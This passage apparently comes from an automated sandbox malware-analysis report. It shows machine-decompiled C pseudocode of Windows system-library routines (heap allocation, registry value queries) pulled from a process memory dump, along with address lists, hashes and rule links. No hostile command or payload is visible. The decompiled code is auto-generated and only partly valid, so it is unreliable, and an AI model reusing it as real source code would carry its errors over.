								goto L50;
							}
							_t146 =  *0x4967b9c; // 0x0
							_t235 = L04894620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4967b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E048AA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0488FFB0(_t193, _t235, 0x4968550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L048977F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L048977F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4967b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4967b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E048B37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4967b9c; // 0x0
									_t214 = L04894620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E048B37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4967b10 =  *0x4967b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4967b04 =  *0x4967b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L048977F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L048977F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4967b08 =  *0x4967b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E048B57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E048BF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L048977F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E048AA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L048977F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E048B96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                          0x0488849b
                          0x0488849b
                          0x0488849b
                          0x0488849b
                          0x0488849d
                          0x048884a2
                          0x048884a7
                          0x048884b1
                          0x048884d8
                          0x00000000
                          0x048884b3
                          0x048884c4
                          0x048884c9
                          0x048884cd
                          0x048884cf
                          0x048884cf
                          0x048884d6
                          0x048884e6
                          0x048884e9
                          0x048884ec
                          0x048884ef
                          0x048884f2
                          0x048884f4
                          0x048884fc
                          0x04888501
                          0x04888506
                          0x04888509
                          0x048886e0
                          0x048886e5
                          0x048886e8
                          0x048886ed
                          0x048886f0
                          0x048886f2
                          0x048d9afd
                          0x048d9b02
                          0x048884da
                          0x048884df
                          0x048884df
                          0x048886fa
                          0x048886fd
                          0x048886fe
                          0x04888701
                          0x04888706
                          0x04888709
                          0x0488870b
                          0x00000000
                          0x00000000
                          0x04888711
                          0x04888725
                          0x04888727
                          0x0488872a
                          0x0488872c
                          0x048d9af0
                          0x048d9af5
                          0x04888732
                          0x04888732
                          0x04888732
                          0x04888735
                          0x04888737
                          0x04888515
                          0x04888515
                          0x04888518
                          0x0488851d
                          0x04888523
                          0x04888527
                          0x0488852b
                          0x04888537
                          0x04888539
                          0x0488853c
                          0x0488853e
                          0x0488868c
                          0x04888691
                          0x04888699
                          0x0488869b
                          0x04888744
                          0x04888748
                          0x048886a1
                          0x048886a1
                          0x048886a1
                          0x048886a4
                          0x048886a8
                          0x048d9bdf
                          0x048d9bdf
                          0x048886ae
                          0x048886b0
                          0x00000000
                          0x048886b6
                          0x00000000
                          0x048d9be9
                          0x048886b0
                          0x04888544
                          0x0488854a
                          0x0488854d
                          0x04888551
                          0x0488876e
                          0x04888778
                          0x0488877b
                          0x04888780
                          0x04888557
                          0x04888557
                          0x0488855d
                          0x0488855d
                          0x0488856b
                          0x0488856e
                          0x04888570
                          0x04888573
                          0x04888576
                          0x04888576
                          0x04888579
                          0x0488857b
                          0x00000000
                          0x00000000
                          0x04888581
                          0x048885a0
                          0x048885a2
                          0x048885a5
                          0x048885a7
                          0x048d9b1b
                          0x048d9b1b
                          0x0488862e
                          0x0488862e
                          0x04888631
                          0x04888631
                          0x04888634
                          0x04888636
                          0x04888669
                          0x04888669
                          0x0488866b
                          0x048d9bbf
                          0x048d9bc4
                          0x048d9bc8
                          0x048d9bce
                          0x048d9bce
                          0x04888671
                          0x04888671
                          0x04888674
                          0x04888676
                          0x048d9bae
                          0x048d9bae
                          0x04888676
                          0x0488867c
                          0x0488867e
                          0x04888688
                          0x04888688
                          0x00000000
                          0x0488867e
                          0x04888638
                          0x04888638
                          0x0488863b
                          0x0488863e
                          0x0488863f
                          0x04888642
                          0x04888645
                          0x04888648
                          0x0488864d
                          0x048d9b69
                          0x048d9b6e
                          0x048d9b7b
                          0x048d9b81
                          0x048d9b85
                          0x048d9b89
                          0x048d9ba7
                          0x048d9b8b
                          0x048d9b91
                          0x048d9b9a
                          0x048d9b9f
                          0x048d9b9f
                          0x04888788
                          0x0488878d
                          0x04888763
                          0x04888763
                          0x04888766
                          0x00000000
                          0x04888766
                          0x048d9b70
                          0x00000000
                          0x048d9b70
                          0x04888656
                          0x0488865a
                          0x0488865c
                          0x04888752
                          0x04888756
                          0x00000000
                          0x00000000
                          0x0488875e
                          0x00000000
                          0x0488875e
                          0x04888662
                          0x04888662
                          0x04888662
                          0x04888666
                          0x00000000
                          0x04888666
                          0x048885b7
                          0x048885b9
                          0x048885bc
                          0x048885bf
                          0x048885cc
                          0x048885d1
                          0x048885d4
                          0x048885db
                          0x048885de
                          0x048885e0
                          0x048d9b5f
                          0x00000000
                          0x048d9b5f
                          0x048885e6
                          0x048885ea
                          0x048886c3
                          0x048886c5
                          0x048886c8
                          0x048886ca
                          0x048d9b16
                          0x00000000
                          0x048d9b16
                          0x048886d6
                          0x048885f6
                          0x048885f6
                          0x048885f9
                          0x04888602
                          0x04888606
                          0x0488860a
                          0x0488860b
                          0x0488860e
                          0x04888611
                          0x00000000
                          0x04888611
                          0x048885f3
                          0x00000000
                          0x048885f3
                          0x04888619
                          0x0488861e
                          0x0488861e
                          0x04888621
                          0x04888622
                          0x04888623
                          0x04888625
                          0x0488862c
                          0x00000000
                          0x0488873d
                          0x00000000
                          0x0488873d
                          0x04888737
                          0x0488850f
                          0x04888512
                          0x00000000
                          0x04888512
                          0x00000000
                          0x048884d6

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96653857a6858a6991f671c1a60e57c0b947f6dfb707fb463a96966bf919aea9
                          • Instruction ID: 5e0b814606c419bb27b116960276976893aa121980764aff7e7f3352a3eb819e
                          • Opcode Fuzzy Hash: 96653857a6858a6991f671c1a60e57c0b947f6dfb707fb463a96966bf919aea9
                          • Instruction Fuzzy Hash: 6FB12AB1E04209DFDB24EFA9C984AADBBB9BF44308F544A2DE505EB241E770BD45CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048A513A, Relevance: .3, Instructions: 258COMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E048A513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x496d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E048BD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04892280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04894620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E048BF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0488FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x496b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E048BB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                          0x048a5142
                          0x048a514c
                          0x048a5150
                          0x048a5157
                          0x048a5159
                          0x048a515e
                          0x048a5165
                          0x048a5169
                          0x048a516c
                          0x048a5172
                          0x048a5176
                          0x048a517a
                          0x048a517a
                          0x048a517a
                          0x048a517f
                          0x048e6d8b
                          0x048e6d8e
                          0x048e6d91
                          0x048e6d95
                          0x048e6d98
                          0x048e6d9c
                          0x048e6da0
                          0x048e6da3
                          0x048e6da7
                          0x048e6e26
                          0x048e6e26
                          0x048e6e2a
                          0x048a51f9
                          0x048a51f9
                          0x048a51fe
                          0x048e6e33
                          0x048e6e33
                          0x048e6e39
                          0x048e6e3d
                          0x048e6e46
                          0x048e6e50
                          0x00000000
                          0x00000000
                          0x048e6e52
                          0x048e6e53
                          0x048e6e56
                          0x048e6e5d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048e6e5f
                          0x048e6e67
                          0x048e6e77
                          0x048e6e7f
                          0x048e6e80
                          0x048e6e88
                          0x048e6e90
                          0x048e6e9f
                          0x048e6ea5
                          0x048e6ea9
                          0x048e6eb1
                          0x048e6ebf
                          0x00000000
                          0x00000000
                          0x048e6ecf
                          0x048e6ed3
                          0x00000000
                          0x00000000
                          0x048e6edb
                          0x048e6ede
                          0x048e6ee1
                          0x048e6ee8
                          0x048e6eeb
                          0x048e6eed
                          0x048e6ef0
                          0x048e6ef4
                          0x048e6ef8
                          0x048e6efc
                          0x00000000
                          0x00000000
                          0x048e6f0d
                          0x048e6f11
                          0x048e6f32
                          0x048e6f37
                          0x048e6f3b
                          0x048e6f3e
                          0x048e6f41
                          0x048e6f46
                          0x00000000
                          0x00000000
                          0x048e6f4c
                          0x048e6f50
                          0x048e6f50
                          0x048e6f54
                          0x048e6f62
                          0x048e6f65
                          0x048e6f6d
                          0x048e6f7b
                          0x048e6f7b
                          0x048e6f93
                          0x048e6f98
                          0x048e6fa0
                          0x048e6fa6
                          0x048e6fb3
                          0x048e6fb6
                          0x048e6fbf
                          0x048e6fc1
                          0x048e6fd5
                          0x048e6fda
                          0x048e6fda
                          0x048e6fdd
                          0x048e6fe2
                          0x048e6fe7
                          0x048e6feb
                          0x048e6fef
                          0x048e6ff3
                          0x048a520c
                          0x048a520c
                          0x048a520f
                          0x048a5215
                          0x048a5234
                          0x048a523a
                          0x048a523a
                          0x048a5244
                          0x048a5245
                          0x048a5246
                          0x048a5251
                          0x048a5251
                          0x048e6f13
                          0x048e6f17
                          0x048e6f17
                          0x048e6f18
                          0x048e6f1b
                          0x048e6f1f
                          0x048e6f23
                          0x00000000
                          0x048e6f28
                          0x048a5204
                          0x048a5204
                          0x048a5208
                          0x00000000
                          0x048a5208
                          0x048a5185
                          0x048a5188
                          0x048a518a
                          0x048a518e
                          0x048a5195
                          0x048e6db1
                          0x048e6db5
                          0x048e6db9
                          0x048a519b
                          0x048a519b
                          0x048a519e
                          0x048a51a7
                          0x048a51a9
                          0x048a51a9
                          0x048a51b5
                          0x048a51b8
                          0x048a51bb
                          0x048a51be
                          0x048a51c1
                          0x048a51c5
                          0x048a51c9
                          0x048a51cd
                          0x048a51cd
                          0x048a51d8
                          0x048a51dc
                          0x048a51e0
                          0x048e6dcc
                          0x048e6dd0
                          0x048e6dd5
                          0x048e6ddd
                          0x048e6de1
                          0x048e6de1
                          0x048e6de5
                          0x048e6deb
                          0x048e6df1
                          0x048e6df7
                          0x048e6dfd
                          0x048e6e01
                          0x048e6e05
                          0x048e6e09
                          0x048e6e0d
                          0x048e6e11
                          0x048e6e11
                          0x048a51eb
                          0x048e6e1a
                          0x048e6e1f
                          0x048e6e21
                          0x048e6e23
                          0x00000000
                          0x048a51f1
                          0x048a51f1
                          0x00000000
                          0x048a51f1

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f18ca724338dd49731d816b1706a9e33d568159ea06f1d608e0f9d71ae0d45bd
                          • Instruction ID: 57d23f298497adcda7405cb3fd6d712aec8cca343029a1b8fc433adc797bd67d
                          • Opcode Fuzzy Hash: f18ca724338dd49731d816b1706a9e33d568159ea06f1d608e0f9d71ae0d45bd
                          • Instruction Fuzzy Hash: 9CC134756083819FD354CF29C480A6AFBE1BF89308F544A6EF899DB352E771E845CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487C600, Relevance: .2, Instructions: 225COMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E0487C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x496d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04886D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E048BB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4967b9c; // 0x0
					_t74 = L04894620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E048B9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L048977F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E048BF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E048B13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
